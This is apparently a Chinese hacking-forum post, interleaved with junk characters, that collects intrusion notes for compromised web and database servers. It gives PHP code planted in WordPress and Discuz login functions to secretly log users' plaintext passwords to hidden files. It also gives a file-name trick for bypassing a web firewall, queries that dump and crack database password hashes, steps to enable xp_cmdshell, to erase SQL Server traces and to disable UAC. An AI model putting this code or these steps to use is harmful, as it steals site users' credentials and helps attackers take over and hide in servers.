if($log_user&&$log_pwd&&$log_ip){+ S' l, Y9 M: q" i/ R. v
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);: {" Z. F* P& v- J- r8 q9 L
}
' _6 r1 N" {9 }  [9 y当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
, m$ N8 v" o% L" a5 ]1 _就是搜索case ‘login’6 S) Q; s! E, `5 x
在它下面直接插入即可,记录的密码生成在pwd.txt中,
' }% D1 N' @: ?) p其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
5 M- n2 `9 x: P1 T  I利用II6文件解析漏洞绕过安全狗代码:8 s7 F( p2 f" c7 f; {
;antian365.asp;antian365.jpg' I0 v. |! L6 s0 ^2 G& R$ G

" w; z5 f$ i) S各种类型数据库抓HASH破解最高权限密码!
* i1 v% v# ^( W& o( \2 N1.sql server2000! \* Q$ @. t& `) Z6 Y  Q0 }! f. |
SELECT password from master.dbo.sysxlogins where name='sa'2 L3 y7 B9 t9 x+ ~3 S
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341
) t/ d* I1 a- V$ y+ T: `: X" g2FD54D6119FFF04129A1D72E7C3194F7284A7F3A8 \1 _: ^( t# K& q1 g- E$ ]* V
9 q7 }7 z4 R! ?. }" Q
0×0100- constant header
4 M, f8 D" F- u34767D5C- salt
$ T, B# ?. ?* v* q0 Q4 S0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash" w( j6 P& }5 m( |# f0 ^  c+ W0 n
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash  E  L0 L( |7 [  P/ G1 @: E# s
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash2 K6 J4 P+ Z+ q5 n9 E; B+ l- r
SQL server 2005:-
6 Z! k9 c) \( g) H% x0 B4 [SELECT password_hash FROM sys.sql_logins where name='sa'
, x$ g' _7 J% r1 T0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
8 E; X; B- c1 R, Y$ h, K' T0×0100- constant header
3 M6 `0 H- |8 V993BF231-salt) W1 O% c7 B, z* ~- w+ `0 n
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
/ f5 C7 G8 L  J1 a3 O* W+ ccrack case sensitive hash in cain, try brute force and dictionary based attacks.+ i) q) b2 n" t  S' S6 A) s
/ {8 `4 K+ @6 B& [/ K) F
update:- following bernardo’s comments:-, h$ l% S' \0 h: a, w3 ?6 T$ u1 N) Y0 {
use function fn_varbintohexstr() to cast password in a hex string.: z9 g8 U: T5 A7 ?, e1 C' l* b% g
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
+ y; G  Q4 U* f% }
# k+ }* ~# R1 r9 zMYSQL:-# i$ y/ @2 V/ k6 E/ B
# \+ p/ Z& k! ~) W& o
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
9 Z! N% A5 b6 u: G  m& S! r# H/ d( V4 d& }
*mysql  < 4.1
) ]$ d- t6 P; o3 |5 {4 l: S8 i2 @0 @$ ^. j1 f9 }8 r; Q+ P
mysql> SELECT PASSWORD(‘mypass’);. p- C. ?3 O' R6 o9 ~
+——————–+
$ Z* p' O) J6 z2 e| PASSWORD(‘mypass’) |/ s: w: O8 c: C/ z4 |5 h+ Z0 H! O
+——————–+
( U7 W& s: [7 D' ^+ w/ A| 6f8c114b58f2ce9e   |' z" e. a- t6 p0 O- P
+——————–+
) Y6 N) o) S# [0 l/ e1 A, L6 p1 c% {" B
*mysql >=4.1. f/ k8 S1 {( B% @1 P( w# T2 _
4 R0 ], a+ W" O* h' B9 }1 Q$ Y: a
mysql> SELECT PASSWORD(‘mypass’);& C4 I) H, c5 M7 e/ v/ Z6 }
+——————————————-+8 d& o/ ]  i3 }* f9 F
| PASSWORD(‘mypass’)                        |: M5 z6 U7 O8 P7 I' h
+——————————————-+
8 Z- T6 B! p7 P( P, b| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |/ Q( W6 L8 t+ n. O
+——————————————-+
% [) w5 @9 W8 t% L
. R1 a9 Z+ Z, ?8 x5 XSelect user, password from mysql.user
  @! i- V9 y: c7 h0 g5 U. hThe hashes can be cracked in ‘cain and abel’
% s) v+ Y0 i! i" K7 O/ ~* L% d
5 M+ {. P: C1 |1 A7 D$ F* _! X/ HPostgres:-8 f7 P  C2 Z9 @7 W
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
2 h! z8 s2 m$ O( y+ L/ K+ i8 fselect usename, passwd from pg_shadow;
" ], \0 n# i* z* C5 q& T* d: Lusename      |  passwd* G3 m" z1 m; ?0 s. u+ T) i
——————+————————————-
9 H9 w4 v, t7 x" w$ }" y, U6 Dtestuser            | md5fabb6d7172aadfda4753bf0507ed4396- T4 z, M" ~! G+ f1 V9 E
use mdcrack to crack these hashes:-
1 b: y  p: s8 V- Z( P; o$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
6 O. X, t9 {5 w0 T5 z" S. t
5 B  x7 a) U% s3 F' sOracle:-
$ a* l+ G9 G* M' N) B: }/ t- S8 h7 d1 C: yselect name, password, spare4 from sys.user$
$ w! E8 Z% }  E4 M2 ?" thashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
+ `* ?6 T' q  q6 k# \4 ^More on Oracle later, i am a bit bored….7 j" Z6 I- C/ g: Y7 z
8 `# ?+ b- c. l( n, j+ D7 c/ i- Y( u) ~
/ N& f& e5 @5 y: s- [
在sql server2005/2008中开启xp_cmdshell
4 B6 r: J+ y; B: ~* Z6 l3 N2 }: q2 j/ y-- To allow advanced options to be changed.
  ]0 m! |, {3 C! X* DEXEC sp_configure 'show advanced options', 1/ q: y2 ]4 K+ G7 k+ U" Q+ l
GO
) Q  K2 t4 q; Q$ z0 n-- To update the currently configured value for advanced options.
1 t8 x' W9 R5 Z) M  |* URECONFIGURE8 w; u3 ?9 d* |) F6 M
GO
: y) U! l& z: S& C' o9 D' Y, w) A-- To enable the feature.- n$ ^, l  t+ d
EXEC sp_configure 'xp_cmdshell', 1
1 O/ |+ U& {" f2 MGO0 o* k. Y: @  X' j) @$ C5 b/ l
-- To update the currently configured value for this feature.' O1 m) }4 _: I. y& E
RECONFIGURE7 p1 S- S+ L. K& @6 i1 Y4 p
GO
5 B( u1 M) h* p- Y" ]; WSQL 2008 server日志清除,在清楚前一定要备份。
  s( g" ]8 W0 L+ w# y7 D% e如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:1 T" t" W( [+ ~+ r; h7 ~
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
& j/ m) J- x; Z4 k& n& s8 y) c, N
& H/ r; A1 h0 O对于SQL Server 2008以前的版本:
6 A% }6 F+ A) }  m" a  KSQL Server 2005:2 ~! v' @6 t' Y* a
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat* z" u5 E4 Y/ K/ J( S$ A4 b6 o/ |
SQL Server 2000:
8 t: a& O$ z. R清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
4 F% O6 t1 A, N* _& P+ O# O7 t( l4 W) f2 G4 N
本帖最后由 simeon 于 2013-1-3 09:51 编辑
7 Z; Z& i9 _/ G: p5 a  l; J! T& ]" c7 U2 f* a

. ~& i9 @" h+ f* qwindows 2008 文件权限修改% V: w) _! f6 H' Y
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
+ L, j5 h$ L+ L- z, N2 O% I# v2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad986 _8 t% w7 \, `7 E6 U
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,; V# M  g% J& d5 o1 U6 X4 ]/ K: B

/ ]6 S& s, {! L) cWindows Registry Editor Version 5.00
; ?+ Y) D4 n$ K2 F[HKEY_CLASSES_ROOT\*\shell\runas]
0 [, o" G+ }* r# p! K" U& i@="管理员取得所有权"
# _3 A. I$ c2 m: F"NoWorkingDirectory"=""7 j# K! @/ O: j! q) k
[HKEY_CLASSES_ROOT\*\shell\runas\command]
+ u# p/ F( A9 j. _) T5 @6 w@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"; c% _" f* ^( S% K6 {8 |& U" z
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
9 Y: @8 T& p5 C" }5 c[HKEY_CLASSES_ROOT\exefile\shell\runas2]
/ I, E# |! S2 t% q0 K/ }+ t6 n& X@="管理员取得所有权", L4 P* D% i& d$ m1 j$ E) h
"NoWorkingDirectory"=""6 u4 ^# R% v% e  t( k- A/ `: J
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]2 U, B: s" _3 N4 l' m& g* a
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"3 T+ b* s' n7 L* d
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"* {( o. L3 z, W: _' q3 c
& c2 d4 d/ s! v: K  U" e
[HKEY_CLASSES_ROOT\Directory\shell\runas]& \, z! l, k' x9 B0 |0 T) J
@="管理员取得所有权"& F1 v1 O# Q3 h( A4 l. C
"NoWorkingDirectory"=""9 g! X/ W7 \4 S3 Q. }0 F( s' C6 @' m0 Y! E
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]; d* c* y+ s: }' y( F2 |% I
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
% ^" L* D( W0 n+ v, a2 W"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
' Z) `; Q+ o. J' Q8 c
7 ?) o! K3 w# ]2 v. N+ i% O& E, U. r+ y$ g9 G
win7右键“管理员取得所有权”.reg导入' v9 ?/ G$ i$ O( X
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,/ u7 X% g- w2 z& |/ L/ u
1、C:\Windows这个路径的“notepad.exe”不需要替换
0 _8 P" t+ \( b$ i! \2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
  z; e" V8 Q  f3、四个“notepad.exe.mui”不要管  ^5 z* _0 g  \# G1 u
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
& Z0 w2 V; f% U+ W& d4 mC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
$ _3 I. `8 M  ]; Q" s替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
; M# I2 g0 h& y8 l5 E/ @" x替换完之后回到桌面,新建一个txt文档打开看看是不是变了。: T* T- U$ Q- Q( }' U$ B
windows 2008中关闭安全策略: / X9 v3 _8 n* h  u; Z- U7 i
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$ l+ @, T8 j5 E3 W8 U' s" y
修改uc_client目录下的client.php 在
- y/ s- E0 W& w, n& X* Wfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
. Q3 W0 A% O2 t3 y4 N1 Z# h, l下加入如上代码,在网站./data/cache/目录下自动生成csslog.php9 O8 ~, S3 f8 F( R- u, b, ^$ L
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw' G0 \# \# @% S2 ^2 K" h
if(getenv('HTTP_CLIENT_IP')) {
" o" V$ o7 d$ s2 ^( m' L! U$ l: v$onlineip = getenv('HTTP_CLIENT_IP');
9 B/ A5 g( z/ @* z! n  |* c1 J( P0 f} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
- C) J9 n" C. I. g$onlineip = getenv('HTTP_X_FORWARDED_FOR');
% G2 n# O( U$ n7 D* C2 l} elseif(getenv('REMOTE_ADDR')) {
, a: j- a9 n, u$onlineip = getenv('REMOTE_ADDR');
3 s, j3 P6 p$ S$ z( ~, |} else {
7 }! N. g! r$ V( ?$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
+ |8 S9 H  z0 B' m}7 ~+ K' v  A0 R
     $showtime=date("Y-m-d H:i:s");
; ]) r2 j. ]1 J2 ]( N) C" w  q1 h    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";+ B# a& d0 W' s
    $handle=fopen('./data/cache/csslog.php','a+');
* b% K4 L0 w1 E+ e' ^. W9 O' v    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表